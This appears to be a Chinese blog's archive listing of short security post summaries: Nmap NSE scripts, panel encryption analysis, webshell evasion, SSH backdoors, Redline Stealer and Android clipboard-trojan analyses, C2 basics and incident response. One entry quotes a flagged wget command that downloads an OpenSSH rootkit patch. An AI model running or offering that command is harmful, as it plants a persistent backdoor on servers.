论Nmap中一些常用的NSE脚本
摘要:https://www.freebuf.com/sectool/210694.html nmap site.test.lan nmap site.test.lan --script http-enum nmap -p80 --sc ript http-wordpress-enum --script-
阅读全文
posted @ 2022-06-16 10:56
06 2022 档案
宝塔面板后台加密分析
摘要:1. 什么是宝塔面板 2. 宝塔面板后台能否破解? 3. 宝塔面板后台加密方式分析 3.1 入口校验
阅读全文
posted @ 2022-06-16 10:35
阿里云监测恶意脚本
摘要:命令行: wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
阅读全文
posted @ 2022-06-15 17:39
Nginx的配置文件
摘要:Nginx的核心配置文件/usr/local/nginx/conf/nginx.conf 参考: https://blog.csdn.net/smilehappiness/article/details/106675860 ... #全局块 events { #events块 ... } http
阅读全文
posted @ 2022-06-10 17:59
Chrome 浏览器追踪链接跳转过程
摘要:chrome web store 安装插件 link redirect trace 可以看到跳转的整个过程,用于分析offer
阅读全文
posted @ 2022-06-10 16:29
webshell 免杀
摘要:https://xz.aliyun.com/t/11391
阅读全文
posted @ 2022-06-08 17:53
ssh backdoor
摘要:http://www.broadview.com.cn/article/124 https://www.freebuf.com/articles/network/255302.html https://javamana.com/2021/12/202112270415304965.html ssh
阅读全文
posted @ 2022-06-08 11:19
Redline Stealer
摘要:Redline Stealer 执行流程 Entity2:存储配置数据的结构。 Entity7:存储收集结果的结构。(环境细节+实体1)Entity1:存储凭证详细信息的结构。 环境详细信息,包括受感染的 PC 信息凭证详细信息,包括加密钱包、帐户和用户数据信息
阅读全文
posted @ 2022-06-06 15:56
安卓剪切板木马 Clipper 浮出水面,花样窃取你的数字资产
摘要:一旦恶意应用被打开,它就会显示一个虚假的错误信息并退出,然后在后台默默地运行。恶意应用将其图标隐藏在Android主屏幕上的应用程序列表中,如果不仔细查看就很难发现。随后,在每次打开受感染的智能手机或平板电脑时,Clipper木马就会随之自行启动。Clipper木马会随时监视剪贴板内容的变化。一旦用户将电子钱包地址复制到剪贴板,它就会将地址发送到由网络犯罪分子控制的命令和控制服务器。然后,从服务器
阅读全文
posted @ 2022-06-06 11:09
C2
摘要:概念 C&C (Command and Control server,命令和控制服务器),也可写作C2,是一种用于向受恶意软件(自动程序(bot)、木马(rootkit)、蠕虫(worm))感染的计算机的服务器的恶意软件发送指令或更新程序的服务器,即C&C服务器用于控制这些恶意软件。通常,C&C 服
阅读全文
posted @ 2022-06-06 10:41
应急响应实战笔记
摘要:https://bypass007.github.io/Emergency-Response-Notes/ openssl后门可以试试看 https://bypass007.github.io/Emergency-Response-Notes/privilege/%E7%AC%AC4%E7%AF%8
阅读全文
posted @ 2022-06-01 18:05
学习
摘要:https://knightyun.github.io/2021/09/04/exploit-take-down-swindle-website https://knightyun.github.io/2021/12/06/exploit-penetrate-bocai-website
阅读全文
posted @ 2022-06-01 16:48
